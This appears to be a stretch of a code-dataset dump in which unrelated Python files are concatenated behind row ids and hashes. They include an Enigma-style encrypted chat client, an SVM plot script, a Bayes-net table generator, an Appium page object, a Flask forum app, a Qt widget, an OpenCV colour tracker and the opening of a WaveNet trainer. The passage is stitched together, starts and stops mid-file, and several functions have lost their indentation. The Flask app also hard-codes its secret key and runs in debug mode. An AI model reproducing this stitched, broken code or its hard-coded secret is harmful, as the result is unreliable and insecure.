                chunks = []
                bytes_recd = 0
                # first packet: serialized total length (matches dumps() in send)
                msg_length = loads(self.my_socket.recv(8000))
                while bytes_recd < msg_length:
                    chunk = self.my_socket.recv(min(msg_length - bytes_recd, 2048))
                    if chunk == b'':
                        raise RuntimeError("socket connection broken")
                    chunks.append(chunk)
                    bytes_recd = bytes_recd + len(chunk)
                # next packet: RSA-encrypted Enigma settings string
                encryption_data = loads(self.my_socket.recv(500))
                encryption_data = self.rsa_object.decrypt(encryption_data).decode()
                # chars 0-5: three rotor numbers followed by three start letters
                enigma_sim.rotors.set_rotors(int(encryption_data[0]), int(encryption_data[1]),
                                             int(encryption_data[2]), encryption_data[3],
                                             encryption_data[4], encryption_data[5])
                # the remainder splits evenly into the two plugboard halves
                plugboard1_str = encryption_data[6:(len(encryption_data) - 6) // 2 + 6]
                plugboard2_str = encryption_data[(len(encryption_data) - 6) // 2 + 6:]
                for i in range(len(plugboard1_str)):
                    enigma_sim.plugboard.add_letter(plugboard1_str[i])
                    enigma_sim.plugboard.add_letter(plugboard2_str[i])
                msg = b''.join(chunks).decode()
                msg, username = msg.split(";")
                # decode Morse first, then run the Enigma to recover the text
                msg_dec = enigma_sim.decrypt_encrypt_text(morse_object.
                                                          decrypt(msg))
                self.msg_list.append([msg_dec, encryption_data, username])
                if self.refresh_button is not None:
                    # highlight the refresh button: new messages are waiting
                    self.refresh_button.configure(fg="red")
            except ConnectionResetError:
                # server closed the connection - stop the receive thread
                finish = True
    def send(self, text_box, rotors_settings=None, plugboard_settings=None):
        """
        send a message to the rest of the clients. if from the
        send box - encrypts according to the time.
        otherwise, from the simulator - encrypts according to its settings.
        :param text_box: Text widget holding the message to send
        :param rotors_settings: optional rotor settings from the simulator
        :param plugboard_settings: optional [plugboard1, plugboard2] lists
        :return:
        """
        morse_instance = Morse()
        enigma_sim = Enigma()
        if plugboard_settings is None and rotors_settings is None:
            # send-box path: let the Enigma derive its own settings
            enigma_sim.set_random_settings()
        else:
            # simulator path: reuse the exact settings the user configured
            enigma_sim.rotors.set_rotors(rotors_settings[0], rotors_settings[1], rotors_settings[2],
                                         rotors_settings[3], rotors_settings[4], rotors_settings[5])
            for i in range(len(plugboard_settings[0])):
                enigma_sim.plugboard.add_letter(plugboard_settings[0][i])
                enigma_sim.plugboard.add_letter(plugboard_settings[1][i])
        # serialize the settings as one string: rotors then both plugboard halves
        # (mirrors the parsing done in receive())
        encryption_data_rotors = ""
        for i in enigma_sim.rotors.get_initial_setting():
            encryption_data_rotors += str(i)
        encryption_data_p1 = ""
        for i in enigma_sim.plugboard.plugboard1:
            encryption_data_p1 += i
        encryption_data_p2 = ""
        for i in enigma_sim.plugboard.plugboard2:
            encryption_data_p2 += i
        encryption_data = encryption_data_rotors + encryption_data_p1 + encryption_data_p2
        my_msg = text_box.get("1.0", END)
        text_box.delete('1.0', END)
        # keep only encryptable characters (upper-case letters)
        msg = self.manage_text(my_msg)
        if msg != "":
            # Enigma encryption first, then Morse encoding
            msg_to_send = morse_instance.encrypt(enigma_sim.decrypt_encrypt_text(msg))
            total_sent = 0
            msg_length = len(msg_to_send)
            # length header first, then the message body in chunks
            self.my_socket.send(dumps(msg_length))
            while total_sent < msg_length:
                sent = self.my_socket.send(msg_to_send[total_sent:].encode())
                if sent == 0:
                    raise RuntimeError("socket connection broken")
                total_sent = total_sent + sent
            # finally the RSA-encrypted settings the receiver needs to decrypt
            self.my_socket.send("encryption data;".encode())
            self.my_socket.send(self.rsa_object.encrypt(encryption_data.encode(), self.server_key))
@staticmethod
def manage_text(msg):
"""
this function customizes the text so it can be encrypted.
:param msg:
:return:
"""
msg = msg.upper()
msg_final = ""
for i in msg:
if i.isalpha():
msg_final += i
return msg_final
if __name__ == '__main__':
    # Launch the chat/simulator client when this file is run directly.
    client = Client()
|
22,492 | 2920f5581469ce5c16f22646b87e795195f254a9 | from svmutil import *
import math
import numpy as np
import matplotlib.pyplot as plt
value = 8
C = [-6, -4, -2, 0, 2]
def _read_features(path):
    """Read a whitespace-separated feature file and return (labels, features).

    Each line is "<digit> <f1> <f2>"; the label is +1 when the digit equals
    the module-level `value`, otherwise -1 (one-vs-all classification).
    """
    y = []
    x = []
    f = open(path, "r")
    for line in f:
        line = line.strip().split()
        # bug fix: the original compared the token *list* to '' (never true),
        # so a blank line would have crashed on float(line[0])
        if not line:
            break
        if float(line[0]) == value:
            ans = 1
        else:
            ans = -1
        y.append(ans)
        x.append([float(line[1]), float(line[2])])
    f.close()
    return y, x


def main():
    """Train one degree-2 polynomial-kernel SVM per exponent in `C` and plot
    sum(|alpha|) against log10(C)."""
    y, x = _read_features("features.train")
    # the test split is loaded for parity with the original script but unused here
    y_test, x_test = _read_features("features.test")
    alphas = []
    for c in C:
        prob = svm_problem(y, x)
        # -t 1: polynomial kernel, -d 2: degree 2, C = 10**c
        param = svm_parameter('-t 1 -d 2 -c ' + str(math.pow(10, c)))
        m = svm_train(prob, param)
        y_alpha = np.array(m.get_sv_coef())
        alpha = 0
        for mem in y_alpha:
            alpha += abs(mem)
        print(alpha)
        alphas.append(alpha)
    print(alphas)
    plt.plot(C, alphas)
    plt.title("17.")
    plt.xlabel("log(10)C")
    plt.ylabel("sigma(alpha)")
    plt.show()
if __name__ == '__main__':
main() |
22,493 | 0e5abb1942bf05e17e9af13c84ad2ac536353b94 | # -*- coding: utf-8 -*-
"""
ontraportlib.models.type_13_enum
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ) on 11/14/2017
"""
class Type13Enum(object):
    """Implementation of the 'Type13' enum.

    Allowed string values for the API's "type" field.

    Attributes:
        SINGLE: the string constant 'single'.
        SUBSCRIPTION: the string constant 'subscription'.
        ONE_TIME: the string constant 'one_time'.
        PAYMENT_PLAN: the string constant 'payment_plan'.

    """
    SINGLE = 'single'
    SUBSCRIPTION = 'subscription'
    ONE_TIME = 'one_time'
    PAYMENT_PLAN = 'payment_plan'
22,494 | 623b5b35cb6e955ed06459dac6340e8ae0be6bc9 |
"""
Compute joint probabilities and pseudo-likelihood estimate for a Bayes Net according to
random selection semantics from a database.
Written in haste---bugs likely remain! It's also been eight months since I wrote real
python, so some things might be more concisely expressed using standard idioms.
Improvements to make:
1. Before doing anything, check global consistancy (functor names, constants, ...)
2. Currently assumes a single domain. Extending to multiple domains is easy but tedious.
3. The algorithm for generating all possible groundings (generateCombos) is far too limited.
Written in old-skool python 2.7 by Ted Kirkpatrick, March 2013.
"""
import copy
import itertools
import math
class Node (object):
    """
    A functor together with its value.  Nodes embedded in a Bayes net
    structure carry the placeholder value IN_TREE, nodes used for querying
    carry QUERY; any other value makes the node a ground literal.
    """
    IN_TREE = '-'
    QUERY = '?'

    def __init__(self, functor, varList, val):
        self.functor = functor
        self.varList = varList
        self.val = val

    def __str__(self):
        args = ",".join(self.varList)
        return "{0}({1}) = {2}".format(self.functor, args, self.val)

    def __repr__(self):
        return self.__str__()

    def eq(self, node):
        # structural equality: same functor, same argument list, same value
        same_functor = self.functor == node.functor
        same_args = self.varList == node.varList
        return same_functor and same_args and self.val == node.val

    def isLiteralNode(self):
        return self.val not in (Node.QUERY, Node.IN_TREE)

    def isQueryNode(self):
        return self.val == Node.QUERY
class Rule (object):
    """ A conditional-probability specification: P(child | parents) = prob """

    def __init__(self, child, parentList, prob):
        self.child = child
        self.parentList = parentList
        self.prob = prob

    def __str__(self):
        parents = ",".join(str(parent) for parent in self.parentList)
        return "P(" + str(self.child) + " | " + parents + ") = " + str(self.prob)
class Grounding (object):
    """ A specific assignment of constants to variables """

    def __init__(self, varList):
        # varList: list of (variable name, constant) pairs
        self.varList = varList

    def val(self, var):
        """Return the constant bound to *var*; raise if it is not bound."""
        for name, constant in self.varList:
            if name == var:
                return constant
        raise Exception ("Var not ground: " + var)

    def groundNode(self, node):
        """Return a copy of *node* with its variables replaced by constants."""
        grounded_args = [self.val(v) for v in node.varList]
        return Node(node.functor, grounded_args, node.val)

    def __repr__(self):
        return ", ".join(name + "=" + str(constant) for name, constant in self.varList)
class Database (object):
    """
    The database: a list of ground literal Nodes recording the functor
    values for specific constant arguments.
    """
    def __init__ (this, attrs):
        this.attributes = attrs
    def funcVal(this, node):
        """
        Return the stored value for the ground query *node*.
        Raises if *node* already carries a literal value, or if no entry
        with the same functor and arguments exists in the database.
        """
        if node.isLiteralNode():
            raise Exception ("Attempted to match nonquery Node "+str(node)+" probability")
        for n in this.attributes:
            if n.functor == node.functor and all ([p[0]==p[1] for p in zip(n.varList,node.varList)]):
                return n.val
        else:
            # bug fix: the original concatenated the Node object itself onto
            # the message, which raised TypeError instead of this Exception
            raise Exception ("Functor not ground: " + str(node))
class NetNode (object):
    """
    A node within a Bayes net: the functor description (a Node) plus the
    list of parent NetNodes it is conditioned on.
    """

    def __init__(self, node, parents):
        self.node = node
        self.parents = parents

    def __str__(self):
        parent_text = ", ".join(str(parent) for parent in self.parents)
        return str(self.node) + " <- (" + parent_text + ")"
class BayesNet (object):
    """ The Bayes net: an ordered list of NetNodes, parents before children """
    def __init__(this):
        this.nodes = []
    def append(this, netNode):
        # every parent must already be in the net, so this.nodes stays
        # in topological order and jointProbs can iterate it directly
        for child in netNode.parents:
            if child not in this.nodes:
                raise Exception ("BayesNet node " + str(netNode) + " added but child " + str (child) + " not already in net")
        this.nodes.append(netNode)
    def jointProbs(this, grounding, db, ruleSet):
        # Ground every node under `grounding`, look up its conditional
        # probability in `ruleSet` (uniform default when no rule matches),
        # and return [(ground node, p), ..., joint, log(joint)].
        probs = []
        joint = 1.0
        for node in this.nodes:
            #print "searching",node
            gn = fillNode(node.node, grounding, db)
            #print "filled node", gn
            gcn = [fillNode(n.node, grounding, db) for n in node.parents]
            #print "filled parents", gcn
            p = ruleMatch(ruleSet, gn, gcn)
            if p == -1:
                # no rule matched: fall back to a uniform distribution
                p = default(gn.functor)
            probs.append((gn, p))
            joint *= p
        probs.append(joint)
        probs.append(math.log(joint))
        return probs
    def variableList(this):
        # sorted list of all distinct variable names used anywhere in the net
        vars = set()
        for n in this.nodes:
            for v in n.node.varList:
                vars.add(v)
        return sorted(list(vars))
def query (node, grounding, db):
    """ Ground *node* with *grounding* and look its value up in *db* """
    ground_node = grounding.groundNode(node)
    return db.funcVal(ground_node)
def fillNode(node, grounding, db):
    """ Return a grounded deep copy of *node* whose value is filled in from *db* """
    grounded = copy.deepcopy(node)
    grounded.val = query(grounded, grounding, db)
    return grounded
def ruleMatch (ruleSet, node, parents):
"""
Locate the value for a grounded node and its parents in a rule set, return -1 if not found.
For functors with binary ranges, when all parents match but child's value does not, return 1-prob for other value.
"""
def getProb (node):
for rule in ruleSet:
#print rule
if (rule.child.eq(node) and
len(rule.parentList)==len(parents) and
all([n[0].eq(n[1]) for n in zip(rule.parentList,parents)])):
#print "winning eq", [n for n in zip(rule.parentList,parents)]
return rule.prob
else:
return -1
prob = getProb (node)
if prob == -1 and functorRangeSize(node.functor) == 2:
tn = copy.copy(node)
tn.val = functorOtherValue(tn.functor, tn.val)
prob = getProb (tn)
if prob != -1:
return 1 - prob
else:
return prob
return prob
def default(functor):
    """ Return the uniform-distribution probability over the range of *functor* """
    return 1.0/functorRangeSize(functor)
def functorRange(functor):
    """ Look up the range (list of possible values) for a functor """
    for name, values in functorRangeList:
        if name == functor:
            return values
    raise Exception ("Functor " + functor + " not present in range list")
def functorRangeSize(functor):
    """ Return the cardinality of the range of *functor* """
    return len(functorRange(functor))
def functorOtherValue(functor, val):
    """ For a functor with a binary range, return the element that is not *val* """
    values = functorRange(functor)
    assert len(values) == 2
    return values[1] if val == values[0] else values[0]
def atomList(joints):
    """ Derive the atom strings from the first row of the joint-probability table """
    assert len(joints) > 0
    # second element of the row; its last two entries are joint prob and log prob
    functorList = joints[0][1][:-2]
    return [node.functor + "(" + ",".join(node.varList) + ")" for (node, _) in functorList]
def jointProbabilities(constants, db, ruleList, bn):
    """ Compute the joint probabilities for every grounding of the net's variables """
    vars = bn.variableList()
    combs = generateCombos(vars, constants)
    joints = [(grounding, bn.jointProbs(grounding, db, ruleList)) for grounding in combs]
    return (vars, atomList(joints), joints)
def generateCombos(vars,constants):
    """
    Generate all possible groundings (assignments of constants to variables).

    Generalized from the original hard-coded two-variable version: works for
    any number of variables/constants via itertools.product, and produces
    groundings in the same order as before for the 2-variable case.
    """
    combs = []
    for assignment in itertools.product(constants, repeat=len(vars)):
        combs.append(Grounding(list(zip(vars, assignment))))
    return combs
def formatJointTableForLaTeX(joints):
    """
    Given a joint probability table, format it for LaTeX.
    This function will have to be tailored for every paper.
    This function simply generates the {tabular} part of the table. The prologue and epilogue,
    including the caption and label, must be specified in the including file.
    Writes the tabular to table1.tex and a \\pseudologp macro (the mean
    log-probability) to tab1plogp.tex.
    """
    (varList, atoms, probs) = joints
    # columns: one per variable + one per atom (last two of probs[0][1] are
    # the joint p and ln p, which get their own double-ruled columns)
    cols = len(varList) + len (probs[0][1])
    with open("table1.tex","w") as out:
        out.write ("\\begin{tabular}{|" + "|".join(["c"]*(cols-2))+"||c|c|}\n")
        out.write ("\\hline\n")
        # Table header
        out.write (" & ".join(varList) + " & " + " & ".join([a for a in atoms]) + " & Joint $p$ & ln~$p$ \\\\ \\hline\n")
        # Table rows
        logps = []
        # NOTE(review): the loop target shadows the outer `probs`; kept as-is
        for (grounding, probs) in probs:
            out.write (" & ".join([val for (var, val) in grounding.varList]) + " & " +
                       " & ".join([str(n.val)+" ({:.1f})".format(p) for (n,p) in probs[:-2]]) +
                       " & {:.2f}".format(probs[-2]) + " & {:.2f}".format(probs[-1]) + "\\\\\n")
            logps.append(probs[-1])
        # A line to indicate there are further entries in the DB
        out.write(" & ".join(["\ldots"]*cols) + "\\\\\n")
        # Close environment
        out.write ("\\hline\n\\end{tabular}\n")
    with open("tab1plogp.tex","w") as plogp:
        # pseudo-likelihood estimate: average of the per-grounding log probs
        plogp.write("\\newcommand{\\pseudologp}{"+"{:.2f}".format(sum(logps)/len(logps))+"}\n")
# ---- The system that we are analyzing ----
# Bayes net structure (parents are appended before their children)
gY = NetNode(Node('g',['Y'],Node.IN_TREE),[])
fXY = NetNode(Node('F',['X','Y'],Node.IN_TREE),[])
gX = NetNode(Node('g',['X'],Node.IN_TREE),[gY,fXY])
cX = NetNode(Node('cd',['X'],Node.IN_TREE),[gX])
bn = BayesNet()
bn.append(gY)
bn.append(fXY)
bn.append(gX)
bn.append(cX)
# Conditional probabilities for the above net (incomplete---see defaultFunctorVals for remaining cases)
cdM = Rule(Node ('cd', ['X'], 'T') , [Node('g', ['X'], 'M')], 0.6)
cdF = Rule(Node ('cd', ['X'], 'T') , [Node('g', ['X'], 'W')], 0.8)
gW = Rule(Node('g', ['X'], 'W'), [Node('g', ['Y'], 'M'), Node('F', ['X', 'Y'], 'T')], 0.7)
gM = Rule(Node('g', ['X'], 'M'), [Node('g', ['Y'], 'W'), Node('F', ['X', 'Y'], 'T')], 0.3)
ruleList = [cdM,cdF,gW,gM]
# Debugging cases
#gyParents = Rule(Node('g', ['Y'],'M'),[Node('cd',['X'],'T')],0.2)
#gY = Rule(Node('g', ['Y'], 'M'), [], .4)
# Ranges for functors (used by functorRange / functorRangeSize)
booleanRange = ['T', 'F']
functorRangeList = [('F', booleanRange), ('g', ['M', 'W']), ('cd', booleanRange)]
# The database
# All constant arguments to functionals must come from the population given in constants
db = Database([Node('F',['anna','bob'],'T'),
               Node('F',['bob','anna'],'T'),
               Node('F',['bob','bob'],'F'),
               Node('F',['anna','anna'],'F'),
               Node('g',['bob'],'M'),
               Node('g',['anna'],'W'),
               Node('cd',['anna'],'T'),
               Node('cd',['bob'],'F')
               ])
# The constants---a single population, from which all variables are drawn (with replacement)
constants = ['anna', 'bob']
"""
grounding = Grounding([('X','anna'), ('Y','bob')])
print "bob's gender", query (Node('g',['Y'],Node.QUERY), grounding, db)
print "F(anna,bob)", query (Node('F',['X','Y'],Node.QUERY), grounding, db)
print "F(bob,bob)", query (Node('F',['Y','Y'],Node.QUERY), grounding, db)
bn.jointProbs(grounding, db, ruleList)
"""
#print jointProbabilities(constants, db, ruleList, bn)
# Entry point: compute all joint probabilities and emit the LaTeX table files
formatJointTableForLaTeX(jointProbabilities(constants, db, ruleList, bn))
|
22,495 | 022c6a7107ad09f621f523541bf9b25703461838 | import time
import page
from bases.base import Base
class LoginPage(Base):
    """Page object wrapping the app's login/logout flows (Appium driver via Base)."""
    def agree(self):
        # tap the "agree" button on the consent dialog
        self.click(page.agree_btn)
    def login(self, username, pwd):
        # switch to password login
        self.click(page.pwd_login_link)
        # enter the account name
        self.input(page.phone_num_input, username)
        # enter the password
        self.input(page.pwd_input, pwd)
        # tap the login button
        self.click(page.login_next_btn)
    def goto_my(self):
        # tap the "My" tab
        self.click(page.my_btn)
    def goto_setting(self):
        # tap the settings entry
        self.click(page.setting_btn)
    def logout(self):
        # tap "log out"
        self.click(page.logout_btn)
        # tap "confirm"
        self.click(page.logout_confirm_btn)
    # return the login error text, falling back to a toast lookup by content
    def get_error_text(self, toast):
        if self.element_is_exist(page.error_txt):
            return self.find_element(page.error_txt).text
        else:
            return self.driver.find_element_by_xpath(f"//*[contains(@text,'{toast}')]").text
    def screenshot(self):
        # save a timestamped screenshot under ../image/
        self.driver.get_screenshot_as_file("../image/{}.png".format(time.strftime("%Y_%m_%d %H_%M_%S")))
    def login_if_success(self):
        # logged in when the "My" tab is visible
        return self.element_is_exist(page.my_btn)
    def logout_if_success(self):
        # logged out when the password-login link is visible again
        return self.element_is_exist(page.pwd_login_link)
|
22,496 | bbc78cea182b9adb51c233b852d609c9fc27c1c2 | import uuid
import os
from flask import Flask,render_template,request,redirect, url_for,make_response
from flask_sqlalchemy import SQLAlchemy
from flask_login import login_user, login_required, current_user, logout_user
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
from sqlalchemy import Column, Integer, String, ForeignKey
from database import init_db,db_session,Base
from login import login_manager
from models import User,Topic,Post
from utils import validate_file_type, split_in_groups, generate_room_id
# Application and extension wiring: SQLite database, Flask-Login manager.
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
login_manager.init_app(app)
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = True
# NOTE(review): hard-coded secret key; should come from config/env in production
app.secret_key = "nikola"
db = SQLAlchemy(app)
init_db()
@app.teardown_appcontext
def shutdown_context(exception=None):
    # drop the scoped session at the end of each request / app context
    db_session.remove()
"""
class User(Base):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key = True)
username = db.Column(String(80), unique=True,nullable="False")
password = db.Column(String(120), unique=True,nullable="False")
def __repr__(self):
return '<User %r>' % self.username
"""
@app.route('/register', methods = ['POST', 'GET'])
def register():
    """GET: show the registration form.  POST: create the user (password
    stored as a werkzeug hash) and send the visitor to the login page."""
    if request.method == 'GET':
        return render_template('register.html')
    hashed = generate_password_hash(request.form['password'])
    new_user = User(username=request.form['username'], password=hashed)
    db_session.add(new_user)
    db_session.commit()
    return redirect(url_for("login"))
@app.route('/login', methods=['GET', 'POST'])
def login():
    """GET: render the login form.  POST: verify the credentials; on success
    rotate the per-session login_id, log the user in and redirect home.

    Bug fix: the original built the redirect-to-mainPage response before
    checking the credentials, so a failed login still redirected to the main
    page as an anonymous user. Failed logins now re-render the login form.
    """
    if request.method == 'GET':
        return make_response(render_template('login.html', user=current_user))
    user = User.query.filter_by(username=request.form['username']).first()
    if user and check_password_hash(user.password, request.form['password']):
        # rotate the login id so older sessions for this account are invalidated
        user.login_id = str(uuid.uuid4())
        db_session.commit()
        login_user(user)
        return make_response(redirect(url_for('mainPage')))
    # authentication failed: show the form again instead of redirecting
    return make_response(render_template('login.html', user=current_user))
@app.route("/logout")
@login_required
def logout():
current_user.login_id = None
db_session.commit()
logout_user()
return redirect(url_for('login'))
@app.route("/topic",methods = ['GET','POST'])
def topic():
if request.method == 'GET':
return render_template("topic.html")
else:
title = request.form['Title']
description = request.form['description']
topic = Topic(name= title,description = description)
db_session.add(topic)
db_session.commit()
return redirect(url_for('mainPage'))
@app.route('/', methods = ['GET'])
def mainPage():
    """Landing page: list every topic for the (possibly anonymous) visitor."""
    all_topics = Topic.query.all()
    return render_template("mainpage.html", user=current_user, topics=all_topics)
if __name__ == "__main__":
app.run(debug=True)
|
22,497 | 19218445861aa5ba1c8356ac9a3b8f0ca81694d4 | from python_qt_binding.QtCore import Qt
from python_qt_binding.QtGui import QIcon
try:
from python_qt_binding.QtGui import QLineEdit, QToolButton, QStyle
except:
from python_qt_binding.QtWidgets import QLineEdit, QToolButton, QStyle
class EnchancedLineEdit(QLineEdit):
    """QLineEdit with an embedded clear button and ESC-to-clear handling.

    The button appears only while the field contains text; clicking it, or
    pressing ESC with text present, clears the field.

    NOTE: the (misspelled) class name is kept so existing importers work.
    """

    def __init__(self, parent=None):
        QLineEdit.__init__(self, parent)
        # Create a clear button with icon
        self.clearBtn = clearBtn = QToolButton(self)
        icon = QIcon.fromTheme("edit-clear", QIcon(":/icons/crystal_clear_button_close.png"))
        clearBtn.setIcon(icon)
        clearBtn.setCursor(Qt.ArrowCursor)
        clearBtn.setStyleSheet("QToolButton { border: none; padding: 0px; }")
        clearBtn.hide()
        # signals, clear lineEdit if btn pressed; change btn visibility on input
        clearBtn.clicked.connect(self.clear)
        self.textChanged[str].connect(self.update_close_button)
        frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
        # Reserve right-hand padding so the text never runs under the button.
        self.setStyleSheet("QLineEdit { padding-right: %dpx; } " % (clearBtn.sizeHint().width() + frameWidth + 1))
        msz = self.minimumSizeHint()
        # The button is assumed square, hence height() is used for both axes.
        self.setMinimumSize(max(msz.width(), clearBtn.sizeHint().height() + frameWidth * 2 + 2),
                            max(msz.height(), clearBtn.sizeHint().height() + frameWidth * 2 + 2))

    def resizeEvent(self, event):
        """Keep the clear button glued to the right edge, vertically centered."""
        sz = self.clearBtn.sizeHint()
        frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
        # Bug fix: use integer division — QWidget.move() requires int
        # coordinates, and `/` produces a float under Python 3.
        self.clearBtn.move(self.rect().right() - frameWidth - sz.width(),
                           (self.rect().bottom() + 1 - sz.height()) // 2)

    def update_close_button(self, text):
        # Show the clear button only while there is text to clear.
        self.clearBtn.setVisible(bool(text))

    def keyPressEvent(self, event):
        '''
        Enable the ESC handling: ESC clears the field when it has text.
        '''
        if event.key() == Qt.Key_Escape and self.text():
            self.setText('')
        else:
            event.accept()
        QLineEdit.keyPressEvent(self, event)
|
22,498 | ab05334f871def1a67a46c536e5d2894745fbc0e | import cv2
import numpy as np
from collections import OrderedDict
import tracker as tracker
class Colores:
    """Webcam colour-blob detector: masks blue/yellow/red regions in each
    frame, draws bounding boxes, feeds detections to a Tracker and overlays
    running per-colour totals.  Press 's' to stop the capture loop.
    """

    # HSV thresholds (OpenCV hue range is 0-179; saturation/value 0-255).
    blue_lower = np.array([100,100,23], np.uint8)
    blue_upper = np.array([125,255,255], np.uint8)
    # yellow_lower = np.array([15,100,20], np.uint8)
    # yellow_upper = np.array([45,255, 255], np.uint8)
    yellow_lower = np.array([20, 100, 100])
    yellow_upper = np.array([30, 255, 255])
    # Red hue wraps around 0/179, so two ranges are combined in maskFrame().
    red1_lower = np.array([0,100,20], np.uint8)
    red1_upper = np.array([5,255,255], np.uint8)
    red2_lower = np.array([175,100,20], np.uint8)
    red2_upper = np.array([179,255,255], np.uint8)
    # NOTE(review): the green bounds are defined but never used below.
    greenLower = (29, 86, 6)
    greenUpper = (64, 255, 255)
    colores = ['blue', 'yellow', 'red']  # display labels, index-aligned with masks/total
    masks = [0, 0, 0]    # per-colour binary masks, filled by maskFrame()
    total = [0, 0, 0]    # per-colour counts, updated via the tracker
    border_colors = [(255,0,0), (0,255,255), (0,0,255)]  # BGR box colours per mask

    def __init__(self):
        # Default camera (index 0); the frame and tracker are per-instance.
        self.cap = cv2.VideoCapture(0)
        self.frame = None
        self.tracker = tracker.Tracker()

    def start(self):
        """Main capture loop: mask, contour, track and display each frame."""
        while True:
            ret, self.frame = self.cap.read()
            # NOTE(review): cv2.flip expects a flip code (0/1/-1), not a
            # rotation constant; cv2.ROTATE_90_CLOCKWISE == 0, so this flips
            # vertically rather than rotating 90 degrees as the original
            # (Spanish) comment claimed — confirm the intended transform.
            self.frame = cv2.flip(self.frame, cv2.ROTATE_90_CLOCKWISE)
            self.rects = []  # detections for this frame: (mask_idx, x, y, w, h)
            frameHSV = self.setHSVColorModel()
            self.maskFrame(frameHSV)
            self.dibujarContornos()
            self.tracker.update(self.rects)
            self.total = self.tracker.setTrackeableObjects(self.total)
            self.markObjects()
            self.showResults()
            if ret == True:
                cv2.imshow('Frame', self.frame)
            if cv2.waitKey(1) & 0xFF == ord('s'):
                break
        self.destroy()

    def markObjects(self):
        """Label each tracked object with its ID and a centre dot."""
        for (objectID, coords) in self.tracker.getObjects():
            text = "ID {}".format(objectID)
            cv2.putText(self.frame, text, (coords[1] + 10, coords[2]),
                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
            self.dibujarPunto(coords[1], coords[2])

    def showResults(self):
        """Overlay the running per-colour totals in the top-left corner."""
        for i in range(len(self.colores)):
            text = "{}: {}".format(self.colores[i], self.total[i])
            cv2.putText(self.frame, text, (10, ((i * 20) + 20)),
                cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)

    def setHSVColorModel(self):
        # Convert the BGR capture frame to HSV for colour thresholding.
        return cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)

    def maskFrame(self, frameHSV):
        """Build the per-colour binary masks (red merges its two hue ranges)."""
        self.masks[0] = cv2.inRange(frameHSV, self.blue_lower, self.blue_upper)
        self.masks[1] = cv2.inRange(frameHSV, self.yellow_lower, self.yellow_upper)
        self.masks[2] = cv2.add(
            cv2.inRange(frameHSV, self.red1_lower, self.red1_upper),
            cv2.inRange(frameHSV, self.red2_lower, self.red2_upper)
        )

    def dibujarContornos(self):
        """Find contours per mask, box those above the area threshold and
        record them in self.rects for the tracker.

        NOTE(review): the 3-tuple return of findContours is OpenCV 3.x only;
        OpenCV 2.x/4.x return 2 values — verify the pinned cv2 version.
        """
        for mask in range(len(self.masks)):
            (_,contornos,hierarchy) = cv2.findContours(self.masks[mask], cv2.RETR_EXTERNAL,
                cv2.CHAIN_APPROX_SIMPLE)
            for pic, contour in enumerate(contornos):
                if (cv2.contourArea(contour) > 600):  # ignore small noise blobs
                    x,y,w,h = cv2.boundingRect(contour)
                    cv2.rectangle(self.frame,(x,y),(x+w,y+h), self.border_colors[mask], 3)
                    cv2.putText(self.frame, '{},{}'.format(x, y), (x+10, y),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.75, [255,255,0], 1, cv2.LINE_AA)
                    self.rects.append((mask, x, y, w, h))

    def dibujarLinea(self):
        # Horizontal reference line at y=230 (not called from start()).
        cv2.line(self.frame, (0 , 230), (640 , 230), (100,155,30), 3)

    def dibujarPunto(self, x, y):
        # Filled green dot marking a tracked object's anchor point.
        cv2.circle(self.frame, (x,y), 7, (0, 255, 0), -1)

    def destroy(self):
        """Release the camera and close all OpenCV windows."""
        self.cap.release()
        cv2.destroyAllWindows()
|
22,499 | dade373b631d4f6f373be560d81ef917ca9ea21c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import argparse
import logging
import os
import sys
import time
from dateutil.relativedelta import relativedelta
from distutils.util import strtobool
import numpy as np
import six
import soundfile as sf
import torch
from sklearn.preprocessing import StandardScaler
from torch import nn
from torchvision import transforms
from wavenet_vocoder.nets import encode_mu_law
from wavenet_vocoder.nets import initialize
from wavenet_vocoder.nets import WaveNet
from wavenet_vocoder.utils import background
from wavenet_vocoder.utils import extend_time
from wavenet_vocoder.utils import find_files
from wavenet_vocoder.utils import read_hdf5
from wavenet_vocoder.utils import read_txt
def validate_length(x, y, upsampling_factor=None):
    """VALIDATE LENGTH.

    Trim *x* and *y* so their lengths agree: without an upsampling factor
    both are cut to the shorter one; with a factor, *x* is trimmed to
    exactly ``len(y) * upsampling_factor`` samples (dropping trailing
    frames of *y* when *x* is too short).

    Args:
        x (ndarray): ndarray with x.shape[0] = len_x.
        y (ndarray): ndarray with y.shape[0] = len_y.
        upsampling_factor (int): Upsampling factor.

    Returns:
        ndarray: Length adjusted x with same length y.
        ndarray: Length adjusted y with same length x.
    """
    if upsampling_factor is None:
        # Simple case: clip both to the shorter of the two.
        shortest = min(x.shape[0], y.shape[0])
        x, y = x[:shortest], y[:shortest]
        assert len(x) == len(y)
        return x, y

    target = y.shape[0] * upsampling_factor
    if x.shape[0] > target:
        x = x[:target]
    elif x.shape[0] < target:
        # x is short: drop enough trailing frames of y (always at least
        # one) so that len(y) * factor fits inside x, then re-clip x.
        deficit = target - x.shape[0]
        frames_to_drop = deficit // upsampling_factor + 1
        y = y[:-frames_to_drop]
        x = x[:y.shape[0] * upsampling_factor]
    assert len(x) == len(y) * upsampling_factor
    return x, y
@background(max_prefetch=16)
def train_generator(wav_list, feat_list, receptive_field,
                    batch_length=None,
                    batch_size=1,
                    feature_type="world",
                    wav_transform=None,
                    feat_transform=None,
                    shuffle=True,
                    upsampling_factor=80,
                    use_upsampling_layer=True,
                    use_speaker_code=False):
    """GENERATE TRAINING BATCH.

    Infinite generator yielding ``((batch_x, batch_h), batch_t)`` where
    batch_x is the (mu-law encoded) input waveform, batch_h the auxiliary
    features and batch_t the one-sample-shifted targets.  Four modes are
    supported: {mini-batch, utterance-batch} x {with, without} upsampling
